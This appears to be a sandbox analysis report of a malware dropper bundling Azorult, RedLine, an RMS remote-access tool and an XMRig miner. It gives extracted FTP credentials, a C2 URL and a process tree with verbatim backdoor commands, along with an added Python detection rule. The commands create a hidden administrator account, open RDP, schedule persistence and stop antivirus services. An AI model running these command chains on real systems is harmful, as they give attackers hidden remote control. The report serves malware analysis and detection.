Resubmissions

18/11/2020, 14:18 UTC

201118-dj27sn3f52 10

18/11/2020, 13:42 UTC

201118-1arz86e7w6 10

18/11/2020, 13:38 UTC

201118-n8jh228ctn 10

Analysis

  • max time kernel
    61s
  • max time network
    71s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18/11/2020, 13:38 UTC

General

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    45.141.184.35
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    109.248.203.91
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies visibility of hidden/system files in Explorer 2 TTPs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • XMRig Miner Payload 2 IoCs
  • ASPack v2.12-2.42 5 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 23 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 56 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 8 IoCs
  • Drops file in System32 directory 5 IoCs
  • Drops file in Program Files directory 31 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 6 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 3 IoCs
  • Modifies registry class 6 IoCs
  • NTFS ADS 3 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs
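Several of the signatures above (Grants admin privileges, Modifies WinLogon, Modifies Windows Firewall, Creates scheduled task(s), Sets file to hidden) correspond to one command-line chain in the process tree that follows: reg.exe clears fDenyTSConnections, netsh opens TCP 3389, net.exe creates the account "john" and adds it to the Administrators and Remote Desktop Users groups under several localized names, the account is hidden from the logon screen via SpecialAccounts\UserList, RDP Wrapper is installed, and ProgramData binaries are registered as scheduled tasks at HIGHEST run level. The Python below is an added detection example written for this page; it is not part of the sandbox report or any vendor's signature set. It runs regex rules over constructed process-creation records whose PIDs and command lines are copied from this report, rolls every hit up to the root process of its chain, and only calls a chain an RDP backdoor when the enable-RDP, add-user and add-to-group steps appear together with a hiding or exposure step. The (pid, ppid, cmdline) record layout, ppid 1000 for the initial sample, the rule names and the benign "admin session" under PID 7000 are assumptions.

```python
"""Roll up the RDP-backdoor command chain from process-creation events.

Added example for this report, not sandbox output. EVENTS is constructed from
the report's process tree (PIDs and command lines as shown there); the
(pid, ppid, cmdline) layout, ppid 1000 for the initial sample and the
PID 7000 "admin session" are assumptions.
"""
import re
from collections import defaultdict

EVENTS = [
    (4012, 1000, r'"C:\Users\Admin\AppData\Local\Temp\update.bin.exe"'),
    (2400, 4012, r'C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui'),
    (3140, 2400, r'"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"'),
    (3664, 3140, r'C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "'),
    (2312, 3664, r'ATTRIB +H +S C:\Programdata\Windows\*.*'),
    (2772, 3664, r'sc config RManService DisplayName= "Microsoft Framework"'),
    (3948, 4012, r'C:\programdata\install\cheat.exe -pnaxui'),
    (2916, 3948, r'"C:\ProgramData\Microsoft\Intel\taskhost.exe"'),
    (4900, 2916, r'C:\ProgramData\Microsoft\Intel\R8.exe'),
    (5016, 4900, r'"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"'),
    (4116, 5016, r'C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "'),
    (4120, 4116, r'"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"'),
    (4140, 4120, r'C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "'),
    (4388, 4140, r'reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f'),
    (188, 4140, r'netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow'),
    (4476, 4140, r'net.exe user "john" "12345" /add'),
    (4532, 4140, r'net localgroup "Администраторы" "John" /add'),
    (4844, 4140, r'net localgroup "Administrators" John /add'),
    (1636, 4140, r'"RDPWInst.exe" -i -o'),
    (4200, 4140, r'reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f'),
    (2192, 4140, r'net accounts /maxpwage:unlimited'),
    (4664, 2916, r'"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST'),
    # Constructed benign activity from an unrelated admin session (assumption).
    (7001, 7000, r'net localgroup "Administrators" alice /add'),
    (7002, 7000, r'C:\Windows\system32\cmd.exe /c dir'),
]

# Rule name -> regex applied to the lower-cased command line. Group names are
# localized (the sample tries Russian, Polish, Spanish and English), so
# group_add keys on the "net localgroup <group> <user> /add" shape rather
# than on any particular group name.
RULES = {
    "rdp_enabled":      r'terminal server.*fdenytsconnections.*\s/d\s+0\b',
    "fw_open_3389":     r'advfirewall firewall add rule .*localport=3389.*action=allow',
    "local_user_add":   r'\bnet1?(?:\.exe)?\s+user\s+("[^"]+"|\S+)\s+("[^"]+"|\S+)\s+/add\b',
    "group_add":        r'\bnet1?(?:\.exe)?\s+localgroup\s+("[^"]+"|\S+)\s+("[^"]+"|\S+)\s+/add\b',
    "hidden_account":   r'winlogon\\specialaccounts\\userlist.*\s/d\s+0\b',
    "pw_never_expire":  r'\bnet1?(?:\.exe)?\s+accounts\s+/maxpwage:unlimited\b',
    "rdpwrap_install":  r'rdpwinst(?:\.exe)?"?\s+-i\b',
    "task_programdata": r'schtasks(?:\.exe)?"?\s+/create\b.*\s/tr\s+"?c:\\programdata\\.*\s/rl\s+highest\b',
    "service_rename":   r'\bsc(?:\.exe)?\s+config\s+\S+\s+displayname=',
    "hide_files":       r'\battrib(?:\.exe)?\s+(?:\+[hs]\s+){2}',
}
COMPILED = {name: re.compile(rx) for name, rx in RULES.items()}


def match_rules(cmdline):
    """Names of every rule whose regex matches the lower-cased command line."""
    low = cmdline.lower()
    return [name for name, rx in COMPILED.items() if rx.search(low)]


def root_of(pid, parent):
    """Follow ppid links up to the first process whose parent is not in the log."""
    seen = set()
    while pid in parent and parent[pid] in parent and pid not in seen:
        seen.add(pid)
        pid = parent[pid]
    return pid


def analyse(events):
    """Return {root_pid: {"hits": {rule: [pids]}, "verdict": str}} per chain."""
    parent = {pid: ppid for pid, ppid, _ in events}
    chains = defaultdict(lambda: defaultdict(list))
    for pid, _, cmd in events:
        for name in match_rules(cmd):
            chains[root_of(pid, parent)][name].append(pid)
    report = {}
    for root, hits in chains.items():
        names = set(hits)
        # A single "net localgroup ... /add" is normal admin work; the verdict
        # needs the enable + create + elevate steps plus a hide/expose step.
        if {"rdp_enabled", "local_user_add", "group_add"} <= names and (
                names & {"hidden_account", "rdpwrap_install", "fw_open_3389"}):
            verdict = "rdp_backdoor"
        elif len(names) >= 2:
            verdict = "suspicious"
        else:
            verdict = "info"
        report[root] = {"hits": dict(hits), "verdict": verdict}
    return report


if __name__ == "__main__":
    for root, info in analyse(EVENTS).items():
        print(root, info["verdict"], sorted(info["hits"]))
```

On a live host the same check should not depend on group names at all: resolve the groups by well-known SID (S-1-5-32-544 for Administrators, S-1-5-32-555 for Remote Desktop Users) and compare membership against a baseline, and pair the command-line rule with the registry state (fDenyTSConnections = 0, SpecialAccounts\UserList entries set to 0) so a chain that ran before logging was enabled is still caught.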

Processes

  • C:\Users\Admin\AppData\Local\Temp\update.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\update.bin.exe"
    1⤵
    • Drops file in Drivers directory
    • Modifies WinLogon
    • Drops file in Program Files directory
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4012
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3140
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3664
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            5⤵
            • Runs .reg file with regedit
            PID:3888
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            5⤵
            • Runs .reg file with regedit
            PID:3168
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            5⤵
            • Delays execution with timeout.exe
            PID:3464
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:3312
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:2028
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1856
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            5⤵
            • Views/modifies file attributes
            PID:2312
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            5⤵
            • Views/modifies file attributes
            PID:1328
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            5⤵
            PID:2488
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            5⤵
            PID:3124
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            5⤵
            PID:2772
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:3636
        • C:\Program Files (x86)\Windows Mail\WinMail.exe
          "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
          4⤵
          • Suspicious use of SetWindowsHookEx
          PID:2240
          • C:\Program Files\Windows Mail\WinMail.exe
            "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
            5⤵
            • Suspicious use of SetWindowsHookEx
            PID:4104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
          4⤵
          PID:4320
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            5⤵
            • Delays execution with timeout.exe
            PID:4400
    • C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3948
      • C:\ProgramData\Microsoft\Intel\taskhost.exe
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        3⤵
        • Executes dropped EXE
        • NTFS ADS
        • Suspicious use of SetWindowsHookEx
        PID:2916
        • C:\Programdata\RealtekHD\taskhostw.exe
          C:\Programdata\RealtekHD\taskhostw.exe
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of SetWindowsHookEx
          PID:4208
        • C:\ProgramData\Microsoft\Intel\R8.exe
          C:\ProgramData\Microsoft\Intel\R8.exe
          4⤵
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious use of SetWindowsHookEx
          PID:4900
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
            5⤵
            PID:5016
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
              6⤵
              • Modifies registry class
              PID:4116
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                7⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4324
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                7⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4332
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                7⤵
                • Delays execution with timeout.exe
                PID:4228
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                7⤵
                PID:4832
              • C:\rdp\Rar.exe
                "Rar.exe" e -p555 db.rar
                7⤵
                • Executes dropped EXE
                PID:4936
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                7⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5000
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                7⤵
                • Delays execution with timeout.exe
                PID:2816
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                7⤵
                PID:4120
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                  8⤵
                  PID:4140
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                    9⤵
                    PID:4388
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                    9⤵
                    PID:4456
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                    9⤵
                    PID:188
                  • C:\Windows\SysWOW64\net.exe
                    net.exe user "john" "12345" /add
                    9⤵
                    PID:4476
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 user "john" "12345" /add
                      10⤵
                      PID:4300
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    9⤵
                    PID:4584
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Администраторы" "John" /add
                    9⤵
                    PID:4532
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                      10⤵
                      PID:4612
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administratorzy" "John" /add
                    9⤵
                    PID:4676
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                      10⤵
                      PID:2820
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administrators" John /add
                    9⤵
                    PID:4844
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administrators" John /add
                      10⤵
                      PID:5116
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administradores" John /add
                    9⤵
                    PID:4020
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                      10⤵
                      PID:5092
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного рабочего стола" John /add
                    9⤵
                    PID:5104
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                      10⤵
                      PID:4412
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного управления" John /add
                    9⤵
                    PID:3652
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                      10⤵
                      PID:4972
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Remote Desktop Users" John /add
                    9⤵
                    PID:4288
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                      10⤵
                      PID:4480
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Usuarios de escritorio remoto" John /add
                    9⤵
                    PID:1940
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                      10⤵
                      PID:4384
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                    9⤵
                    PID:4316
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      10⤵
                      PID:4744
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -i -o
                    9⤵
                    • Executes dropped EXE
                    • Modifies WinLogon
                    • Drops file in Program Files directory
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1636
                    • C:\Windows\SYSTEM32\netsh.exe
                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                      10⤵
                      PID:5112
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -w
                    9⤵
                    • Executes dropped EXE
                    PID:5028
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                    9⤵
                    PID:4200
                  • C:\Windows\SysWOW64\net.exe
                    net accounts /maxpwage:unlimited
                    9⤵
                    PID:2192
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                      10⤵
                      PID:4220
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                    9⤵
                    • Drops file in Program Files directory
                    • Views/modifies file attributes
                    PID:5052
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper"
                    9⤵
                    • Drops file in Program Files directory
                    • Views/modifies file attributes
                    PID:4672
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\rdp"
                    9⤵
                    • Views/modifies file attributes
                    PID:1508
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                7⤵
                • Delays execution with timeout.exe
                PID:4880
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
          4⤵
          • Drops file in Drivers directory
          PID:4436
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:4664
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:4960
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:5036
        • C:\ProgramData\WindowsTask\update.exe
          C:\ProgramData\WindowsTask\update.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          PID:4328
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
      2⤵
      • Creates scheduled task(s)
      PID:3136
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
      2⤵
      • Creates scheduled task(s)
      PID:2412
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
      2⤵
      • Creates scheduled task(s)
      PID:476
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
      2⤵
      • Creates scheduled task(s)
      PID:2936
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appidsvc
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\SysWOW64\sc.exe
        sc start appidsvc
        3⤵
        PID:3996
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appmgmt
                                                                                2⤵
                                                                                  PID:4072
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    sc start appmgmt
                                                                                    3⤵
                                                                                      PID:3976
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                                                                    2⤵
                                                                                      PID:2452
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        sc config appidsvc start= auto
                                                                                        3⤵
                                                                                          PID:688
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                                                                        2⤵
                                                                                          PID:3112
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            sc config appmgmt start= auto
                                                                                            3⤵
                                                                                              PID:4080
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                            2⤵
                                                                                              PID:2972
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc delete swprv
                                                                                                3⤵
                                                                                                  PID:1924
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                                                2⤵
                                                                                                  PID:3700
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc stop mbamservice
                                                                                                    3⤵
                                                                                                      PID:2176
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                                                    2⤵
                                                                                                      PID:2416
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc stop bytefenceservice
                                                                                                        3⤵
                                                                                                          PID:1404
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                                                        2⤵
                                                                                                          PID:3644
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc delete bytefenceservice
                                                                                                            3⤵
                                                                                                              PID:3304
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                                                            2⤵
                                                                                                              PID:4088
                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                sc delete mbamservice
                                                                                                                3⤵
                                                                                                                  PID:3960
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                                                                2⤵
                                                                                                                  PID:1524
                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                    sc delete crmsvc
                                                                                                                    3⤵
                                                                                                                      PID:2508
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                                                                    2⤵
                                                                                                                      PID:2492
                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                        netsh advfirewall set allprofiles state on
                                                                                                                        3⤵
                                                                                                                          PID:2980
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                        2⤵
                                                                                                                          PID:3188
                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                            3⤵
                                                                                                                              PID:2700
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                            2⤵
                                                                                                                              PID:3040
                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                                3⤵
                                                                                                                                  PID:1240
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                2⤵
                                                                                                                                  PID:3820
                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                    netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                                    3⤵
                                                                                                                                      PID:68
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                    2⤵
                                                                                                                                      PID:2184
                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                        3⤵
                                                                                                                                          PID:2648
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                                                                                                                        2⤵
                                                                                                                                          PID:1776
                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                                                                                                                            3⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:2236
